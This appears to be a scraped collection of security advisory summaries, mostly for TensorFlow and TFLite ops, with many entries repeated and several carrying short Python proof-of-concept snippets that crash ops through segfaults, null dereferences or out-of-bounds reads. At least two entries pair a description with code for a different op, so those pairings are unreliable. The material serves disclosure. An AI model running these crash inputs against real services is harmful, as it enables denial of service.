Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in segfault.
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in segfault.
Passing invalid arguments (e.g., discovered via fuzzing) to tf.raw_ops.SparseCountSparseOutput results in segfault.
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)
A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be.
A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …
Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)
A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.
An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …
An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)
An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)
An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
The implementation of TrySimplify has undefined behavior due to dereferencing a null pointer in corner cases that result in optimizing a node with no inputs.
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …
A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.
